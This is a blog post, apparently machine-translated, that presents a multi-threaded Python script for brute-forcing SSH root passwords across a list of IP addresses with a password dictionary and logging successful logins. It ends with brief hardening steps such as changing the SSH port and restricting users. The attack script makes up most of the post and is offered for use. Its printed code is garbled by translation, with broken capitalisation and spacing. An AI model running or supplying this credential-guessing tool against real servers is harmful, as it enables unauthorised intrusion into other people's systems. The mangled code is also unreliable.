Python multi-threaded SSH blasting

Python multi-threaded SSH blasting

Python

0x01. About

Weak password when writing a Python small script, the main function is to achieve the use of multi-threaded explosion SSH, support IP table import, dictionary data import.

The main use is Python's Paramiko module and multithreaded threading module.

So, the first thing to prepare is the dictionary dict, server IP table.

Things are simple, the main default directory is as follows:

|--ssh.scan.py|--/log:    sshd|--/dict:    ip    password

IP and password are placed in one line.

0x02. Code

Below the source bar, file Save as ssh.scan.py , see How to use:python ssh.scan.py -h

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21st 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

#!/usr/bin/python python #-*-Coding:utf-8-*- Import Paramiko,threading,sys,time,os ClassSshthread(Threading. Thread): Def__init__(Self, IP, port, timeout, DIC, LogFile): Threading. Thread.__init__ (self) Self.ip = IP Self.port = Port Self.dict = dic Self.timeout = Timeout Self. LogFile = LogFile DefRun(self): Print"Start Try ssh =%s"% self.ip) Username ="Root" Try Password = open (self.dict). Read (). Split (' \ n ') Except Print"Open dict file '%s ' error"% self.dict) Exit1) for PWDIn Password: Try SSH = Paramiko. Sshclient () Ssh.set_missing_host_key_policy (Paramiko. Autoaddpolicy ()) Ssh.connect (Self.ip, Self.port, username, pwd, timeout = self.timeout) Print"\nip =%s, Login%s =%s \ n"% (Self.ip, username, pwd)) Open (self. LogFile,"a"). Write ("[%s] IP +%s, port =%d,%s =%s \ n"% (Time.asctime (Time.localtime (Time.time ())), Self.ip, Self.port, US Ername, PWD)) Break Except Print"IP =%s, Error%s =%s"% (Self.ip, username, pwd) Pass DefViolencessh(IP, port, timeout, DIC, LogFile): Ssh_scan = Sshthread (IP, port, timeout, DIC, LogFile) Ssh_scan.start () DefMain(ipfile, DIC, log): if ipfile = ="-H": Help () Try Iptext = open (ipfile). Read (). Split (' \ n ') For IPIn Iptext: If IP! =‘‘: Time.sleep (0.5) Threading. Thread (target = violencessh, args = (IP,22,1, DIC, log,). Start () Except Print"Open IP list file '%s ' error"% ipfile) Exit1) DefHelp(): Print"Python ssh.scan.py Instructions for use: \n\ Python ssh.scan.py ip_file_path dict_file_path ssh_log_path \ n ") Exit1) if __name__ = =' __main__ ': Fpath = Os.path.dirname (Os.path.abspath (' __file__ ')) Ipfile = sys.argv[1]if len (sys.argv) > 1 else fpath+ "/DICT/IP" DIC = Sys.argv[2] if len (sys.argv) > 2 else fpath+ "/dict/password" log = Sys.argv[3] if len (sys.argv) > 3 else fpath+"/log/ sshd " try: Os.system (" Clear ") except Keyboardinterrupt: exit (1)

The result is more ugly, self-destruct server:

Blasting results

0x03. Solution

What do we do? Prevent people from exploding chrysanthemum, then modify the SSH default login port. The main modification is to modify the SSH configuration file:

1. Modify Iptables

First you have to cross the firewall and modify the firewall rules:

/sbin/iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 2333 -j ACCEPT

Save rule:

service iptables save

To restart the firewall:

service iptables restart

2. Modify the SSH configuration file

cp /etc/ssh/ssh_config /etc/ssh/ssh_config.bak
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak

To modify the SSH port:

vim /etc/ssh/sshd_config

Add Port 2333 below ports #port 22

vim /etc/ssh/ssh_config

Add Port 2333 below ports #port 22

To restart the SSH service:

service sshd restart

3. Other modifications

Restrict SSH access for users

Suppose we just Xiaocao and Homeway users can use the system via SSH to add to the Sshd_config configuration file

vim /etc/ssh/sshd_config

Modify the following line:

Allowusers Xiaocao Homeway

Code: Http://homeway.me/code/python-violence-ssh.zip

From: Grass

Python multi-threaded SSH blasting